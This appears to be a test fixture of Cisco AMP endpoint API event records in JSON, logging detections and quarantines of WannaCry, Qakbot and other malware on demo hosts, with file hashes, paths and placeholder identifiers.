Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
